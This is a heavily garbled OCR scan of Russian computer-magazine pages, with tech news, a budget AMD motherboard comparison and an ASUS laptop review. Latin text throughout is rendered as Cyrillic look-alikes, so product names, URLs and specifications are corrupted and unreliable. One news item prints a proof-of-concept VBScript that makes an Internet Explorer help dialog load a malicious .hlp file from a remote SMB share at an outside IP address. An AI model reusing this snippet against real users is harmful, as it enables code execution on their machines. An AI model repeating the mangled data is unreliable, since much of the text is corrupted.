Подробная информация: тш.пес-сіізріау-аоіиііопа.ги 

Представительство в Москве: Тел.: (495) 937-8410, Факс (495) 937-8290 реклама 



ОПІСАМІ СотрШегз 
+7(495) 774-3667 
+7(495) 982-3904 
\ллл/\л/.огідатіс.ги 



Легион 

+7(495)601-9040 

+7(812)327-3129 

\ллллл/.Іедіоп.ги 



ЭІЗТІ СВОІІР 
+7(495) 662-9237 
+7(495) 662-9240 
\ллллллсІІ5Іі.ги 



Ланк 

+7(495) 730-2829 
+7(812)333-0111 
ѵѵѵѵѵѵ.Іапск.ги 



КомпьюЛинк 
+7(495)956-3311 
+7(495) 737-8866 
ѵѵѵѵѵѵ.сотриііпк.ги 



Тгіпііу еіесігопіс 
+7(495) 737-8046 
ѵѵѵѵѵѵ.ігі-еі.ги 



АІІѴІХ 

+7(495) 737-5757 
+7(495)615-2057 
ѵѵѵѵѵѵ.аиѵіх.ги 






МЕ6АЫЕѴѴ5 



ЭКСПЛОРЕР УМЕР. ДА 
ЗДРАВСТВУЕТ ЭКСПЛОРЕР! 




ІШ ІпГегпеІ ЕхрІогег 9 

ТеэТ; Огіѵе 





■Сййірі^пд Е'лгЛ Кеніей 




Неуспел весь мир похоронить ІЕ6, а Місгозоіі на конференции М IX уже показа- 
ли девелоперам новый Іпіегпеі ЕхрІогег 9. Скачать предварительную версию 
можно на сайте проекта: іе.гпісгозоЙ.согпЛезібпѵе, здесьже досутпные 
разные тесты для того, чтобы прочувствовать все нововведения в действии. 
Как ни странно, девятке нашлось, чем удивить и порадовать публику. Іпіегпеі 
ЕхрІогег 9 стал первым браузером от «мелкомягких», использующим для повы- 
шения производительности ресурсы видеокарты. Это явно пошло «ослику» на 
пользу- по результатам теста ЭипЭрібегон стал быстрее ІЕ8 примерно в семь 
раз, а Орега 10.10 - в четыре раза. Впрочем, новинка уступила по скорости 
работы с ЭаѵаЗсгірІ Баіагі, Сб готе и Орега 10.50. Также к хорошим новостям 
можно отнести значительное улучшение поддержки НТМбб и появление 
поддержки формата векторной графики 5Ѵ6. С С553 все менее радужно, этот 
стандарт браузер все еще поддерживает не до конца и справляется с ним зна- 
чительно хуже своих конкурентов - в тесте АсібЗ ІЕ9 набрал лишь 55 очков из 
100. Удручает и еще одно - 0 РЭ-ускорен ие работаеттолько в Ѵізіа и ѴѴі псіоѵѵб 
7, так что юзеры ХР оказались в пролете - с ХР новый браузер попросту не 
работает. 



ЕХАЛ САНОЙ ЧЕРЕЗ САНОЙ 



Сапол 

Чудные новости приходят с востока, а точнее из 
Японии, где компания Са поп официально объ- 
явила о желании зарегистрировать, ни много ни 
мало, собственную доменную зону! Дело втом, 



что правила регистра- 
ции новыхзон еще в 
2008 году были пере- 
смотрены и серьезно 
упрощены — если ранее для одобрения заявки 
требовалось доказать социальную важность 
и необходимость новой зоны, то сейчас это 
стало необязательно. Таким образом, вполне 
возможно, чтозона .сапоп, а за ней, наверняка, 
и множество других, действительно получит 



право на жизнь. В Сапоп свое решение мотиви- 
руюттем, что новая зона позволит им создавать 
ІІВІ_для каждой конкретной модели товара и 
региона. Выглядеть это будет примернотак: 
ш.а40. сапоп. Чем Сапоп не нравятся ссылки 
формата а40. сапоп. сот или а40. сапоп. ш — 
загадка. Удастся ли японцам осуществить свою 
задумку и завести официальный сайт сапоп. 
сапоп, узнаем во второй половине 201 1 года, 
когда ІСАІЧІЧ рассмотрит заявку компании. 



В ѴѴАТСНМ01І5Е ПРИШЛИ К ВЫВОДУ, НТО САЙТЫ, ПРЕДОСТАВЛЯЮЩИЕ 
КОРОТКИЕ ІЖ-АДРЕСА ЗАМЕДЛЯЮТ ЗАГРУЗКУ ВЕБ-СТРАНИЦ В СРЕДНЕМ НА 
ПОЛТОРЫ СЕКУНДЫ. 



ДЕМОСЦЕНАЖИВА! 



Известный сайтзсепе.огд, целиком и полно- 
стью посвященный демосцене, традиционно 
собирается раздать слонов лучшим демо- 
мейкерам. В этом году вручение премии едва 
не сорвалось по причине нехватки у органи- 
заторов времени и ресурсов, но все же они 
смогли найти в себе силы.такчто восьмая по 
счету Зсепе.огд Аѵѵа гсіз состоится и церемония 



сохранит статус ежегодной. Если посмотреть 
работы, принимающиеучастие конкурсе (это 
можно и даже обязательно нужно сделать 
по адресу аѵѵа гсіз.зсепе.огд і. то понимаешь: 
демосцена жива. Видел бы ты, что творят номи- 
нанты на премии Везі: Вето, Везі: Вето оп ап 
Оісізсіюоі РІаОюгт, Везі: ЕОюсІз. На скриншоте 
кадр из Егатегапдег’а — одного из главных 



номинантов на победу. Для его запуска, правда, 
понадобится видюха не менее деіюгсе 8800, 
море оперативной и виртуальной памяти, 
быстрый проц и обязательно 0x9. Призы найдут 
своих победителей в апреле в рамках немецкой 
демопати ВгеакроіпЕ где и пройдетофициаль- 
ная часть Зсепе.огд Аѵѵагбз. 




► 014 
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НАЖИМАТЬ Г 1 ОПАСНО! 



Лулзы от компании МісгозоЛ, это уже нечто 
вечное и неискоренимое, благодаря ним 
понимаешь, что в этом мире есть некое посто- 
янство. Воттебе очередной, свеженький перл 
от незабвенного М5 — на этот раз «мелкомяг- 
кие» попросили пользователей не нажимать 
на кнопку Р 1 , потому что это может привести к 
запуску малвари (через сценарий ѴВ5сгірТ) . И 
смех, и грех. Виной всему очередная уязвимость 
в браузерах ІЕ любых версий, которая в самом 
деле позволяет за пустить вредоносный код. 
Используя ѴВВсгірЕ разработчик может показать 
пользователю сплывающее окно, используя 
следующий синтаксис для вызова функции: 
МздВохірготрЩЬиіШпзП.биеН.беІрЕІе.сопІюхІ:]]. 



Параметр Гіеіріііе, указывающий файл помощи, 
который отображается пользователю, если он 
нажмет в момент открытия диалогового окна 
Р1 , и это самое интересное место. Дело втом, 
что в качестве пути можно указать сетевой 
адрес шары. Например, на странице, гдеавтор 
демонстрирует возможность атаки [ ЫірУ/ізес. 
рІ/рос-ізес27 ] это выглядиттак: 

<зсгірЦ Цуре="ЦехЦ/ѵЬзсгірЦ"> 

Ьід = " \\184 . 73 . 14 . 110\РІІВЫС\СезЦ . 
Ыр" 

МздВох "ргезз Р1 Со сіозе Йііз 
аппоуіпд рорир" , , " " , Ьід, 1 
</зсгірС> 




Автор указывает путь специально составленного 
.Ыр-файла, и уже через него вызывает нужный 
процесс на клиентской машине. Любопытно, что 
в самом конце марта МісгозоЛ опубликовал сразу 
целый сборникзаплатокдля своего браузера, 
закрывающий сразу десять дыр, втом числету 
критическую, которая использовала Аврора. 



6ІВАВѴТЕ ТЕСНИОЮбУ И А51І5 ПОЧТИ СРАВНЯЛИСЬ ПО КОЛИЧЕСТВУ ПРОДАЖ 
СИСТЕМНЫХ ПЛАТ - ЗА ПЕРВЫЕ 2 МЕСЯЦА ТЕКУЩЕГО ГОДА ПЕРВЫЕ 

отгрузили 3, 1-3,3 млн штук, вторые 3, 2-3,3 млн. 





Іпзрігіпд Іппоѵаііоп • Регзізіеп* РегТесІіоп 
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его беспроводного комфорта 



Не требует специальных знаний! 

Быстрая настройка беспроводной сети и Іпіегпеі 

Утилита А51І5 Е^Зеіир/ ѴѴРЗ ѴѴііагсі - настройка защищенной беспроводной сети 
и Іпіегпеі-соединения за 2 минуты с предустановками для провайдеров более 
чем в 100 городах России 



Комфортная скорость для всех приложений! : 
Графическая настройка приоритетов 

Я 1 



Удобное перераспределение ширины канала между такими приложениями, 
как голосовые программы, игры, приложения, использующие потоки аудио 
и видео, а также РТР и Р2Р 




& 

* 



Аг 

* 

і дай 






з 



Универсальность и функциональность! 
Подключение Ц$В устройств 

АЗУЗ Е 1 Рііе ЗТіагіпд - личный сетевой файл-сервер с доступом через Іпіегпеі 
АЗУЗ Е2. Ргіпіег Зііагіпд - принт-сервер для поддержки одновременной печати 
и сканирования 






ѵѵѵѵш.а$и$.ги 



Всемирная гарания 2 года 



Горячая линия: 8-800-100-2787 



Щ 

КТ-М1 311 

Многофункциональный 
беспроводной 
маршрутизатор 802 . 1 1 N 



Товар сертифицирован, на правах рекламы. 







РЕВКІІМ 



I Сергей Никитин 




6І6АВУТЕ 

1 6А-МА785ВМТ- 

I МЗІ ІШ2Н 

50ТМ-Е45 



I I 

МЗІ 

7856ТМ-Е45 



АЗІІЗ 

М4А78Т-Е 




иШАВУІЬ 

ОА-МА770Т- 



6ІВАВУТЕ с± 
0А-МА785СМТ 
ІІВ2Н 



АЗІІЗ 



М4А79ТРеІихе 



МЗІ 

798ХТ-645 



І6АВУТЕ 

1А7856МТ- 

ІШ2Н 



АЗІІЗ 

4А78Т-Е 

ОСНОВА ОСНОВ 

ТЕСТИРОВАНИЕ БЮДЖЕТНЫХ СИСТЕМНЫХ ПЛАТ АМ2+/АМЗ 



Системная плата - это основа компьютера и, в общем-то, экономить на ней не 
следует. С другой стороны, на рынке присутствует масса недорогих устройств и 
люди их покупают. Сегодня мы разбираемся в том, что же умеют недорогие «мамки», 
рассчитанные на работу с процессорами АМР Зоскеі АМ2+/АМЗ 



ТЕХНОЛОГИИ 

Системные платы сегодняшнего обзора построены на одном из двух чипсетов 
компании АМО — моделях 790ЕХ или 790ВХ. Южный мосту обеих моделей 
одинаков, это 5В750. Младшей моделью является АМ О 790СХ, у которой в 
наличии имеется 22 линии шины РСІ Ехргезз. С одной стороны этого доста- 
точно, сдругой — при включении трех видеоплатв режиме ТгірІеВгоззбге 
на каждую будет приходиться нетакуж много. А с третьей — много ли людей 
ставиттри графических адаптера в бюджетную системную плату? Компенси- 
ровать небольшое количество линий призвана встроенная графика, давшая 
букву С в название чипсета. Она представлена ядром АТІ Вабеоп Н 03300 и 
нужными интерфейсами. Если ты увидишь платы на чипсете 790Х,тознай, 
что графического ядра в нем нет, а все остальные параметры осталисьтеми 
же. Крометого, АМО вы пускает два еще более недорогих чипсета, 7800 и 770, 
которые отличаются от790-й серии уменьшенным до 16 количеством линий 
шины РОІ-Ехргезз. В остальном их параметры идентичны, разве что в 7800 
установлен графический адаптер АТІ Рабеоп НО 4200. Отаршая версия чипсе- 
та, АМО 790ЕХ, имеетуже32линии РОІ Ехргезз, которые могут делиться какна 
две, таки на четыре группы. Южный мост5В750обеспечиваетта кие функции, 
как поддержка 1205В-портов, наличие контроллера РАЮ, работающего с 
массивами уровне 0, 1 , 5 и 1 0, подключение шести 5АТА-устройств и такдалее. 

МЕТОДИКАТЕСТИРОВАНИЯ 

Ввидутого, что наши недорогие системные платы выделяют совсем немного 
тепла, с которым отлично справляются установленные на них радиаторы, 
замеры температур было решено не проводить, а максимально сосредото- 
читься на скоростных характеристиках устройств. Для этого мы использова- 
ли бенчмарк, встроенный вархиваторѴѴіпРАР.атакже утилиты ѵѵРгіте2. 00 
и ЗирегРі 1 .5. Но чистая производительность системной платы величина 
довольноусловная, у нее есть более важный параметра именно потенциал 
для разгона. 0 помощью умножения множителя ЦП на опорную частоту 



ТЕСТИРУЕМОЕ ОБОРУДОВАНИЕ: 



АЗІІЗ М4А78Т-Е 
АЗІІЗ М4А79Т ВЕШХЕ 
6І6АВѴТЕ 6А-МА770Т-1ШЗР 
ВІ6АВУТЕ 6А-МА7856МТ-ІІВ2Н 
МЗІ 790ХТ-645 
МЗІ 7856ТМ-Е45 



мы выжимали максимум из процессора АНЮ РбепотХ4955 ВЕ (тактовая 
частота 3.2 ГГц]. Причем множитель, несмотря на то, что он был разлочен, 
мы нетрогали, а разгоняли исключительно шину, таккакнас интересовали 
возможности именно системных плат. В итоге тестовый па кет за пускался два 
раза — на базовой и на разогнанной системах. 



ВАТМАН АККНАМАЗѴІЖРРЗ 



Раііі ОеРогсе ОТ 240 Бопіс 
Раііі ОеРогсе ОТ 220 Бопіс 
Раііі ОеРогсе ОТ 220 
БаррМге Расіеоп НШ 5750 
БаррЫге Расіеоп НШ 4670 
БаррЫге Расіеоп НШ 4650 




0 10 20 30 40 50 60 70 80 



Самая продвинутая плата на чипе ІЧѴШІА побеждаетза счет опти- 
мизации игры именно под чипы этого производителя 



► 016 
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ВІВАВѴТЕ 

6А-МА7856МТ- 

ІШ2Н 



ѳ 



ТЕСТОВЫЙ СТЕНД 

Процессор: 3,2 ГГц (1 6x200), АМО РЬепот 11X4 955 ВЕ 
Видеоплата: ЗаррЫге Расіеоп Н 03450 
Память ООН2. 2x1 Гб, А-ОАТААХ21І800РВ2Ѳ4-2Р (4-4- 
4-12) 

Память 001*3:2x1 Гб, АепеопХШпеАХН760Ш00-13Ѳ 

(СІ_8) 

Жесткий диск: 1 ,5 Тб, Зеадаіе Ваггасисіа ЗТЗІ 500341 А5 
Блокпитания: 750 Вт, Сог5аігТХ750ѴѴ РоѵѵегЗиррІу 
Процессорный кулер: 1700 об/мин, ІЧосШа ЫН-0 1 2Р 
ОС:ѴѴіпсІоѵѵ5ХРРго1 : е55Іопа[5РЗ х32 




АЗІІЗ 

М4А78Т-Е 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ЧИПСЕТ: АМО 7906Х И 5В750 
ПАМЯТЬ: ООРЗ 800/1 066/1 333/1 600 
ГРАФИЧЕСКОЕЯДРО: АМО ВАОЕОІЧ НО 3300 
АУДИО:НІ0Н ОЕРІЫІТІОЫ АІЮІО 
І_АЫ: 6І6АВІТ ЕТНЕРЫЕТ 

РАЗЪЕМЫ: 2ХРСІ ЕХРВЕ55 XI 6; 2Х РСІ ЕХРРЕ55 XI ; 2ХРСІ 
КОННЕКТОРЫ: 12ХІІБВ; 2ХІЕЕЕ1394; ЮЕ; 6Х5АТА 

ФОРМ-ФАКТОР, СМ: 24 4X30 5, АТХ 



□ □□ 



+ 

Инженеры компании А51І5, проектировавшие эту плату, отлично спра- 
вились сзадачей по разводке компонентов. Снабдив устройство двумя 
разъемами РСІ Ехргеззхіб, они позаботилисьотом, чтобы установлен- 
ные в эти слоты графические адаптеры не закрывали собой остальные 
коннекторы системной платы. Такой подход позволяет создать мощную 
игровую систему, особенно если использовать не самый слабый процес- 
сор от компанииАМО. Нодажееслиты решишьограничиться одним ви- 
деоадаптером, то увеличить производительностьтебе поможет разгон. 

В ходе наших манипуляций над частотой ВСЦ< мы подняли его частоту 
до 240 МГц, соответственно, тактовая частота центрального процессора 
возросла до 3936 МГц. Помимотого, что это неплохая скорость сама по 
себе, это еще и пятый результат в нашем обзоре. 



Мы уже упомянули, что инженеры А51І5 хорошо поработали над проек- 
тированием данной платы, выполнив очень качественную разводку ком- 
понентов. Но недостатоку нее все же есть, правда, лежитон в несколько 
иной плоскости — у устройства очень высокая цена. 





АЗІЮ 

М4А79ЮЕШХЕ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: АМО 790ЕХ И 5В750 
ПАМЯТЬ: ООРЗ 1 600/1 333/1 066/800 

ГРАФИЧЕСКОЕ ЯДРО: Н ЕТ 
АУДИО: НІОН О ЕРІ N ІТІ О N АИ О I О 
ЬАЫ: ВІВАВІТ ЕТНЕРІМЕТ 
РАЗЪЕМЫ:4Х РСІ ЕХРРЕ55Х16; 2Х РСІ 
КОННЕКТОРЫ: 12ХН5В; 2ХІЕЕЕ1394; 1ХЮЕ; 6X5 АТА; 1ХЕОО; 1Х5Р0ІЕ 
ІІЧ/ОІІТ 

ФОРМ-ФАКТОР, СМ: 24.4X30.5, АТХ 



+ 

Литера Т” в названии этой платы говорито многом знающему человеку. 
А конкретно отом, что данное устройство поддерживает процессоры 
АМО РЬепот II под сокет АМЗ, а вместе сними память ООРЗ. Заявка не- 
плохая и она оправдала себя: наштестовый процессор АМР РЬепот II Х4 
955 ВЕудалось разогнатьдо 4144 МГц, что является лучшим результатом 
в обзоре! Опорная частота в этом случае достигла 259 МГц. Как и другое 
изделие А51І5 в нашем тесте, плата М4А79Т Реіихе отличается инже- 
нерной продуманностью разводка компонентов выполнена очень 
грамотно, поэтому ничто ничему не мешает и не загораживает. 



Помимо высокой цены, которая, впрочем, характерна для большинс- 
тва изделий А51І5, у данной платы есть еще один недостаток, который 
будет несколько мешать ее оверклокингу, — это нежный ВІ05. В том 
случае, если устройство разогнано слишком сильно, система перестает 
запускаться в принципе. Поэтому данный процесс должен быть очень 
аккуратным. С другой стороны, несмотря на это, рекорд разгона в тесте 
был, как мы уже говорили, был поставлен именно на этом устройстве. 
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РЕВКІІМ 



М51 7900ХТ-645 

6І6АВУТЕ 6А-МА770Т- 
ѴОЗР 

А5У5М4А78Т-Е 




ѵѵРгіте 2.00 32 т разгон, сек 
■ ѵѵРгіте 2.00 32 т , сек 
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Утилитой ѵѵРгіте 2.00 также была зафиксирована победа устройс- 



тва отАБІІБ 




6І6АВУТЕ 
ВА-МА770Т-ШР 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: АМ 0 770 И 5В710 
ПАМЯТЬ: ОИРЗ 1 600/1333/1 066/800 

ГРАФИЧЕСКОЕ ЯДРО: НЕТ 

АУДИО: 8- КАНАЛЬНЫЙ АУДИО КОДЕК РЕАІ_ТЕКАІ_С888 
ЬАЫ: РЕАБТЕК81 1 1С/0(Ь) (1 0/1 00/1 000 МБИТ) 

РАЗЪЕМЫ: 1ХРСІ ЕХРРЕ55 XI 6 ; 2ХРСІ; 4Х РСІ ЕХРРЕ550Х1 
КОННЕКТОРЫ: 8ХБ5В; 1ХР5/2 (КЛАВИАТУРА); 1ХР5/2 (МЫШЬ); 
6X5 АТА; 1Х5РБІЕ I N ; 1Х5РБІР ОИТ; 1ХЮЕ; 2ХІЕЕЕ 1394А 
ФОРМ-ФАКТОР, СМ: 24 4X30 5, АТХ 




6І6АВУТЕ 

6А-МА7856МТ-ІШ2Н 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ЧИПСЕТ: АМ Б 7850 И 5В710 
ПАМЯТЬ: БОРЗ 1 800 (ОС)/1 666/1 333/1 066 
ГРАФИЧЕСКОЕ ЯДРО: АМ Б ВАБЕОІЧ НБ4200 
АУДИО: 8-КАНАЛЬНЫЙ АУДИО КОДЕК РЕАЬТЕК АБС 
ЬАІЧ: РЕАБТЕК81 1 1 С 

РАЗЪЕМЫ: 1ХРСІ ЕХРРЕ55Х16; 2Х РСІ; 1ХРСІ ЕХРРЕ55Х1 ; 
КОННЕКТОРЫ: 1X1 БЕ; 1ХІЕЕЕ 1394А; ІХЬРТ; 1Х5РБІЕ ІІЧ/ОІЯ; 1ХБ-50В; 
1ХБѴІ-Б; 1ХЕ5АТА; 1ХНБМІ; 1ХР5/2 (КЛАВИАТУРА); 1ХР5/2 (МЫШЬ); 
1ХРЛ45 ЬАІЧ; 5РБІЕ ОБТ; 6ХЫ5В 

ФОРМ-ФАКТОР, СМ: 24.4X21 .8, МІСРОАТХ 



□ 



□ □□ 



+ 

Если ты хочешь снабдить свой компьютер массой дополнительныхуст- 
ройств.то эта плата какразто, что тебе нужно. Она оснащена двумя слотами 
РСІ, четырьмя разъемами РСІ Ехргеззхі и одним гнездом РСІ Ехргеззхі 6 
для установки графического адаптера, поэтому, скорее всего, все твои 
устройства туда поместятся. Но одним количеством разъемов, пусть и 
большим, достоинства этой платы не ограничиваются. Именно на ней мы 
смогли разогнать наш тестовый процессор до немалых4 ГГц, что является 
вторым результатом в нашем тесте. Нужно отметить, что при этом цена 
данной платы очень радует глаз и кошелек. 

Несмотря на обилие разъемов, недостаток этой платы связан как раз 
с ним же. Но уже не с РСІ, а с портом ІБЕ. Он расположен не очень 
удачно, поэтому если в компьютер будет установлена видеоплата 
с массивной системой охлаждения, то установить ІБЕ-устройство 
будет крайне проблематично. Проблема довольно странная, так как, 
во-первых, уже давно разработаны меры противодействия ей (пово- 
рот разъема на 90 градусов), а, во-вторых, интерфейс ІБЕ порядком 
устарел и его присутствие на топовой плате вовсе не обязательно. 



+ 

Одна из двух плат формата МісгоАТХ в нашем обзоре. Несмотря ни на что, 
такие небольшие устройства, позволяющие создать малогабаритную 
систему, пользуются на рынке определенной популярностью. Для того, 
чтобы не забивать малый объем системного блока лишними компонен- 
тами, инженеры ОідаЬуІе снабдили плату встроенной графической пла- 
той АТІ Пабеоп НБ 4200, которая сэкономит нетолько свободное место 
внутри ПК, но и твои финансы. Так как в небольших корпусах компоненты 
больше подвержены перегреву, технология Б Ига БигаЫеЗ, приме- 
ненная в данной плате, поможет повысить надежность и стабильность 
работы системы. 

Небольшие размеры платы — это палка о двух концах, таккакони 
являются одновременно и достоинством устройства и причиной его не- 
достатков. Разводка компонентов не самая лучшая, например, порт РСІ и 
разъемы 5АТА будут блокированы в случае установки в слот РСІ Ехргезз 
хі 6 графического адаптера. С разгономтоже были проблемы, нам 
удалось поднять опорную частоту только до 225 МГц. Поэтому результаты 
тестирования были столь невысоки. 



► 018 
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М5І7900ХТ-645 



6ЮАВѴТЕ 6А-МА770Т- 

иозР 

А5У5М4А78Т-Е 




ѴѴіпРАР разгон Кбайт в сек. 
■ ѴѴіпВАР Кбайте сек. 



После разгона все участники практически сравнялись по скорости 

пайптиі г паматиіл 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: АМй 790Х И $В710 
ПАМЯТЬ: 0РР2 1066/800/667/533 

ГРАФИЧЕСКОЕ ЯДРО: НЕТ 

АУДИО: 8-КАНАЛЬНЫЙ АУДИО К0ДЕКРЕАИЕКАЮ889/АЮ885 
ЦМ: РЕАЕТЕКАЕС889/АЮ885 

РАЗЪЕМЫ: 2ХРСІ ЕХРРЕ52Х16; 2ХРСІ ЕХРРЕ22Х1 ; 2ХРСІ 
КОННЕКТОРЫ: ІХРОй; 6Х2АТА; 1ХАТА133ЕЮ; 1Х2Р0ІР-01ІТ; 1ХТРМ; 
1ХР2/2 (КЛАВИАТУРА]; 1ХР2/2 (МЫШЬ); 6ХІІ2В; 1ХСОМ 

ФОРМ-ФАКТОР, СМ: 24.4X30.5, АТХ 




МЫ 

7856ТМ-Е45 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: АМ 0 7856 И 5В710 
ПАМЯТЬ: ООН2 1 066/800/667/533 
ГРАФИЧЕСКОЕЯДРО: АМР РАОЕОІЧ НО 4200 
АУДИО: РЕАІТЕК НІѲН-ЕІ\Ю АЮО 
І_АЫ: Р БАНЕК А0С889/АЮ885 

РАЗЪЕМЫ: 1ХРСІ ЕХРРЕ55 XI 6 ; 2ХРСІ; 1ХРСІ ЕХРРЕ55Х1 
КОННЕКТОРЫ: 1ХЮЕ; 4ХІІ5В; 6Х5АТА; 1ХАТА133; 1Х5Р0ІЕ01ІТ; 1ХТРМ; 
1ХР5/2 (КЛАВИАТУРА); 1ХР5/2 (МЫШЬ): 4ХИ5В: 1ХРЛ45; ІХОѴІ-О; 
1ХѴ6А; 1ХНОМІ 

ФОРМ-ФАКТОР, СМ: 24.4X21 .8, МІСРОАТХ 



□ □□ 



□ □□□ 



+ 

Несмотря на свою относительно невысокую цену, плата М5І 790ХТ-С45 
оснащена двумя слотами РСІ Ехргеззхіб, которые позволяют создать 
мощную графическую подсистему. Другим доводом в пользу построе- 
нии на ней производительного ПКявляются результаты оверклокинга, 
которые мы смогли получить. Итак, опорная частота шины, после наших 
шаманских плясок, подняласьдозначения 243 МГц, что является весьма 
и весьма неплохим результатом. Который, кстати, наглядно демонстри- 
руют результаты бенчмарков. 

К недостаткам платы можно отнести ее приверженность кустаревшим 
технологиям. Например, она обладаетСОМ-портом и коннектором для 
подключения ЕОИ, которые никакнельзя назватьсовременными компо- 
нентами. Крометого, что плата поддерживает толь ко память типа ООВ2, 
которую никакнельзя назвать самой быстрой, она не оставляет ресурса 
для модернизации, вследствие популярности стандарта РОРЗ. 



+ 

Хотя эта плата и обладает невысокой ценой, отдача от нее наблюдается 
очень высокая. Чтобы не мучитьтебя, сразу скажем, что нам удалось 
поднять опорную частоту до 243 МГц, то есть до результата, аналогичного 
старшей и более дорогой модели М5І 790ХТ-В45. Такчто с производи- 
тельностью и возможностями ее повышения у этого устройства все в по- 
рядке. Крометого, М5І 7850ТМ-Е45 — это плата форм-фактора МісгоАТХ, 
который позволяет использовать ее в небольших системных блоках. 
Чтобы не забивать его лишними деталями, в твоем распоряжении встро- 
енное графическое ядро АТІ Вабеоп НО 4200, но еслиты не признаешь 
таких решений, то тебя спасет порт РСІ Ехргеззхіб. 

Невысокая цена платы определила ее главный недостаток, коим являют- 
ся не очень качественные элементы питания. Такова обратная сторона 
дешевизны устройства, впрочем, если продумать систему охлаждения 
то, вероятно, этого можно будет избежать. 



выводы 

Наш тест доказал, что на рынке существует 
хороший выбор недорогих системных плат 
для процессоров АМР АМ2+/АМЗ и каждый 



сможет выбрать устройство по своему вкусу. 
Они есть большие и маленькие, быстрые и 
функциональные, схорошим разгонным по- 
тенциалом и не очень. Титул «Выбор редак- 
ции» сегодня достается плате А51І5 М4А79Т 



Оеіихе, за ее лучшие результаты в тестах. 

Но разгоняй ее аккуратно, а то она любит 
покапризничать. А «Лучшая покупка» — это 
6І6АВУТЕ 6А-МА770Т-1ЮЗР за невысокую 
цену и отличную производительность, т 
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РЕККІІМ 



■ ■ ЕВГЕНИЙ ПОПОВ 




АЗІЯ №1.Іа 



УНИВЕРСАЛЬНЫЙ НОУТБУК 



За последнее время нашейтестовой лаборатории приходилось видеть 
нетакуж много действительно интересных новинок в области мобиль- 
ных компьютеров. В большинстве своем это были повторяющие друг 
друга модели, которые не вызывали у нас особых эмоций, однако при- 
бывший к нам н оутбук А5Ц5 N61^ способен раскалить железное сердце 
любого техноманьяка. Чем же так необычен этотлэптоп — мы расскажем 
далее. 



АППАРАТНЫЕ ОСОБЕННОСТИ 

Начать следуете повествования о платформе, 
ведь именно новейшая железная база является 
главной фишкой представленного ноутбука. 
Итак, АЗИЗ N61 За собран на базе набора сис- 
темной логики Іпіеі® АиЬигпбаІе ІМС вевязке 
с процессором Іпіеі® Соге™ І7-620М, который 
отличается рабочей частотой 2,67 ГГц , но может 
увеличивать ее до 3,3 ГГц благодаря технологии 
Іпіеі® ТигЬо ВоозГ Это приводит кувеличению 
производительности однопоточных и многопо- 
точных приложений. 

Дабы оценить возможности СРІІ, следует 
обратить внимание на результаты тестирования 
втомжеЗирег РІ. Здесь вычислительная ско- 



рость процессора в проекции на время расчета 
числа «пи»с миллионом знаков послезапятой 
составляет чуть более 13 секунд — это очень 
высокий результат, который не под силу боль- 
шинству настольных чипов. Стоит отметить, что 
здесь идет речь о модели Іпіеі® Соге™ І7. Но 
нам известно о существовании модификаций 
АЗ 115 N61 и на базе Іпіеі® Соге™ І5-430М, а 
также версий с поддержкой технологии ЫѴЮІА 
Орбтііз и, в частности, графического конт- 
роллера СеРогсе СТ325. Наша модель — одна 
изсамых мощных. Возвращаясь кизучению 
аппаратных особенностей нельзя не обратить 
внимание на емкость жесткого диска. Поль- 
зователю предоставляется 640 Гб на одном 
носителе. Ноутбуки по производительности все 



больше начинаютприближаться кнастольным 
ПК, и этот факт не может не радовать. Дисплей 
сдиагональю Ібдюймов и БЕБ-подсветкой 
позволит смотреть видео высокой четкости 
с максимально допустимым разрешением 
1366x768. Динамики ноутбука весьма хороши 
для модели такого формата. Большой запас 
громкости, чистая передача аудиоданных. 
Нельзя забывать и о наличии порта 115В 3.0 
на левой панели — поддержку та ко го разъема 
мы видим на ноутбуке впервые. Естьтакже и 
два ИЗВ 2.0, которые можно найти с правой 
стороны. Отметим также, что ноутбук способен 
в зависимости от режима работы (от батареи 
или от сети) переключаться между мощным 
дискретным адаптером АТІ МоЬіІЛу Рабеоп 
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НО 5730 и экономным контроллером Іпіеі® ОМА НО. Последний не даст 
возможности игратьв игры или выполнять сложные задачи, требующие 
необходимой графической базы. Но при этом платформа сможет больше 
времени работать от батареи. Такой подход, на наш взгляд, более чем 
разумен. При этом от пользователей нетребуется лишнихтелодвижений 
для переключения режима — система сделаетэто самостоятельно. 

ДИЗАЙН 

Внешний обликА51І5 N61 За покажется знакомым для многихлюби- 
телей портативных компьютеров. Предыдущие сборки систем А51І5 
N61 использовали аналогичный экстерьер, что, впрочем, неумаляет 
его практичности. Единственное, что можетсмутить — это глянцевая 
крышка, однако сегодня так сложно встретить ноутбук без полированных 
поверхностей, что такой момент ничуть не пугает. Обширная рабочая 
область покрыта материалом под названием «флок», напоминающим 
на ощупь резину. Во-первых, такое покрытие не вытрется со временем, 
а во-вторых, на нем не видны жирные отпечатки и мелкие царапинки. 
Клавиатура с разделенными декоративной решеткой клавишами очень 
удобна и подходит для любого типа печати. Предусмотрен здесь и циф- 
ровой блок N 000 Раб. Тачпад поддерживаеттехнологию тиІІіІоисН.так 
что пользователь может осуществлять некоторые действия при помощи 
ажтрех пальцев. Сенсорная панель достаточно широка для комфорт- 
ной работы, да и к клавишам действия претензий нет. Над клавиатурой 
можно видеть декоративную панель с симпатичной клавишей включе- 
ния устройства (светится приятным белым цветом при работе] и рядом 
кнопок. Три из них позволяютуправлять звуком при воспроизведении 
видео или звукового файла — громче, тише и полностью выключить. Еще 
одна дает возможность запускать воспроизведение или ставить на паузу. 
Последняя предназначена для выбора режима энергопотребления. 
Пользователю предлагаются следующие режимы: развлечения (кино 
и музыка], высокая производительность, офисная работа, экономия 
заряда. Ксожалению, мощность устройства накладываетопределенные 
ограничения на время автономной работы. Даже с включением интег- 
рированного графического адаптера нам удалось заставить проработать 
А51І5 N61 б лишь немногим более двух с половиной часов. Возможно, 
ситуацию, но не слишком сильно, спасет более емкая батарея. 

МЕТОДИКА ТЕСТИРОВАНИЯ 

Для проверки ноутбука мы включили режим поддержки дискретного гра- 
фического контроллера. Таким образом, мы имели возможность опреде- 
лить эффективность ноутбука в разнообразныхтестовых приложениях. В 
качестве тестовых платформ были запущены классические бенчмарки от 
Еиіигетагк, а также пара тестов, более популярных у наших заграничных 
